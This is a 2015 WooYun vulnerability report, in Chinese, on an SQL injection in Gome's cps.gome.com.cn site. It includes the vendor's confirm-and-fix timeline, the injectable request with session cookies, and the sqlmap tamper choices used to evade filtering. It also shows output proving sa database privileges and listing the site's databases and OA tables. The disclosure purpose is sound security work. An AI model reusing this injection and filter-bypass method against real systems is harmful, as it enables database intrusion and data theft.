乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-16: 细节已通知厂商并且等待厂商处理中 2015-12-18: 厂商已经确认,细节仅向厂商公开 2015-12-25: 厂商已经修复漏洞并主动公开,细节向公众公开
该网站cps.gome.com.cn 数据库600多个表,可以垮裤查OA系统数据;sa权限可以直接列目录。
GET /Cps/News/IndexShow?NoticeName= HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Referer: http://cps.gome.com.cn/Cps/News/IndexShowCache-Control: no-cacheAccept-Language: en-us,en;q=0.5X-Forwarded-For: 127.0.0.1Host: cps.gome.com.cnCookie: BIGipServerpool_cps=2033334794.20480.0000; topNewsPopup=0; newsListPopup=0; JSESSIONID=pgMdWxvR1JJvK2Xbw6ZlZbCpGLQmDJxzd2PbT9Wk1G2Fs39z2R9s!2018110695; uid=CjozJlZxIpEwFoB2AwUAAg==; DSESSIONID=370dfcf6f7f1456083ddd554757a848aAccept-Encoding: gzip, deflatetamper 用between 和 space2comment,绕过简单过滤web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NETback-end DBMS: Microsoft SQL Server 2012[19:53:13] [INFO] fetching current user[19:53:13] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[19:53:13] [INFO] retrieved:[19:53:13] [WARNING] reflective value(s) found and filtering outsacurrent user: 'sa'[19:53:17] [INFO] fetched data logged to text files under './output/cps.gome.com.cn'[*] shutting down at 19:53:17[19:54:29] [WARNING] reflective value(s) found and filtering out当前目录:D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Log\ERRORLOG[19:56:36] [INFO] testing if current user is DBAavailable databases [21]:[*] AdvertisementPromotion[*] CollegeUnion[*] distribution[*] FenxiangbaoCommunity[*] GomeCps[*] GomeCPSClick[*] GomeFXBao[*] GomeOA[*] GomeRecharge[*] GomeVenues[*] GomeWeiXinMall[*] master[*] model[*] msdb[*] NationalBak[*] NationalUnion20140717[*] NationalUnionHistory[*] ProjectStatusLog[*] TaskPlatform[*] tempdb[*] ZzzLinShiOA系统Database: GomeOA[20 tables]+-------------------+| BodyEffect || BodyOccur || Bugs || DaShuJu || DaShuJuName || Daily || FxbDailySitePlat || OccurDailyShop || OccurDailyShopSid || OccurDailySid || OccurProEffect || Project || ProjectBackUp || ProjectFile || QuanOrder || ReceiveProEffect || Task || User || UserDate || Word |+-------------------+
危害等级:高
漏洞Rank:18
确认时间:2015-12-18 10:12
感谢您提供的信息
2015-12-25:漏洞已修复,感谢提报